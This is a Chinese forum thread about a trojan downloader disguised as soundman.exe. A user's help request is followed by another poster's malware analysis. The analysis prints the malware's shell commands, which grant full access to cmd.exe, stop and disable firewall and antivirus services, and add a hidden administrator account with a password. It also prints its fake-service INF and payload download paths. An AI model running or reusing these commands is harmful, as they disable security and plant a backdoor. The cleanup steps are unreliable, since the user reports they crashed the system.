瑞星杀不掉的病毒,每次开机都会出来

开机后杀就会跑出来.

好象是SOUNDMAN.EXE 和 QOQ.EXE, NOTEPDE.EXE, INTERNE.EXE

引起的,每次开机都会杀出十多个来.

它生成数个病毒文件在我的C盘里，主要为 notepde.exe , qoq.exe , SoundMan.exe, ssave.exe.
　　notepde.exe和 SoundMan.exe 这两个文件开机运行，无法关闭。

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

扫描中断,

发现问题: API HOOK

入口点错误: CreateProcessA  目的地地址: Ox01121FFD
入口点错误: CreateProcessB  目的地地址: Ox01122oE5

可以直接修复么?

说是新功能会导致系统崩溃

谢谢楼上,是中了下面的刀,我说的是瑞星无法解决,每次杀完都会出来.如果不连INTERNET就没有关系,连上就又有了.

==========================================================================================

伪soundman.exe木马下载器（qoq.exe notepde.exe ）解决[ 作者：一把锈剑 | 更新日期:2008-4-9 09:16:45 | 阅读次数：253 ] 伪soundman.exe木马下载器解决
特征 qoq.exe notepde.exe popo.exe
1,删除旧版本的病毒然后释放以下文件文件
%windir%\soundman.exe（病毒主程序，木马下载器，图标和常见的soundman程序一样）
%windir%\system32\ttjj3.ini
%windir%\system32\interne.exe
%windir%\system32\qoq.exe （这个应该是PR端口扫描工具）
%windir%\system32\notepde.exe
引用:
2,通过进程枚举，关闭以下进程
shstat.exe
runiep.exe
ras.exe
MPG4C32.exe
imsins.exe
Iparmor.exe
360safe.exe
360tray.exe
kmailmon.exe
kavstart.exe
avp.exe
ccenter.exe
引用:
3,通过rtcShell运行cacls获取cmd.exe的权限，然后通过net stop sc 命令来关闭一些服务，并创建一个new1的管理员帐号
cacls.exe C:\winnt\system32\cmd.exe /e /t /g everyone:F
net stop wscsvc
net stop sharedaccess
sc config sharedaccess start= disabled
sc config wscsvc start= disabled
net stop KPfwSvc
net stop KWatchsvc
net stop McShield
net stop "Norton AntiVirus Server"

net user new1 12369 /add
net user new1 12369
net user new1 /active:yes
net localgroup administrators new1 /add
引用:
4.映象挟持kmailmon.exe，任务管理器等正常程序 ，其中挟持ctfmon来启动病毒程序soundman.exe
360Loader.exe
360Safe.exe
360tray.exe
IceSword
ctfmon.exe
Iparmor.exe
kmailmon.exe
iparmor.exe
ras
runiep
taskmgr.exe
引用:
5,尝试删除一些安全软件的启动项目，但是是否成功就不得而知了
hkey_local_machine\software\microsoft\windows\currentversion\run\360safetray
hkey_local_machine\software\microsoft\windows\currentversion\run\kavstart
hkey_current_user\software\microsoft\windows\currentversion\run\kavpfw
hkey_local_machine\software\microsoft\windows\currentversion\run\vptray
hkey_local_machine\software\microsoft\windows\currentversion\run\kav
hkey_local_machine\software\microsoft\windows\currentversion\run\runeip
hkey_local_machine\software\microsoft\windows\currentversion\run\ravtask
hkey_local_machine\software\microsoft\windows\currentversion\run\rfwmain
引用:
6,重命名ieprot.dll为iepret.dll，safemon.dll为safemes.dll 估计重启以后不能运行了 ^_^
引用:
7,生成1.inf通过rundll32.exe安装为服务Help and Support（注意这个本身是系统帮助支持中心但是被病毒替换了）
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=helpsvc,,My_AddService_Name
[My_AddService_Name]
DisplayName=Help and Support
Description=启用在此计算机上运行帮助和支持中心。如果停止服务，帮助和支持中心将不可用。如果禁用服务，任何直接依赖
于此服务的服务将无法启动。
ServiceType=0x10
StartType=2
ServiceBinary=%11%\interne.exe
ErrorControl=0
引用:
8.上传中招者的ip地址到病毒作者的服务器 下载盗号木马机器狗病毒等病毒文件，并通过端口扫描工具PR扫描局域网和IP段 135
端口是否有打开  保存在C:\Por.aed文件中^_^
/rc/zj/gx.jpg 貌似是自我更新啊
ssave.jpg   
notepde.jpg  加了一个未知壳，似乎是一个远程控制木马
/and/1.exe
.....
/and/11.exe(11-19链接失效了)
/and/19.exe

.....
/and/25.exe
www.newjian.com

这步很重要：复制c:\winnt\system32\dllcache\explorer.exe粘贴到c:\winnt\路径下  替换该路径下的原文件；复制c:\winnt\system32\dllcache\ctfmon.exe文件粘贴到c:\winnt\system32\路径下 替换该路径下原文件

=================

这步确实很重要, 因为无法COPY就做下去了，结果是电脑重启后,进不了桌面,内存报错, 系统挂掉了。

只能重装把 2000PF换成了XP.  看还会不会有问题。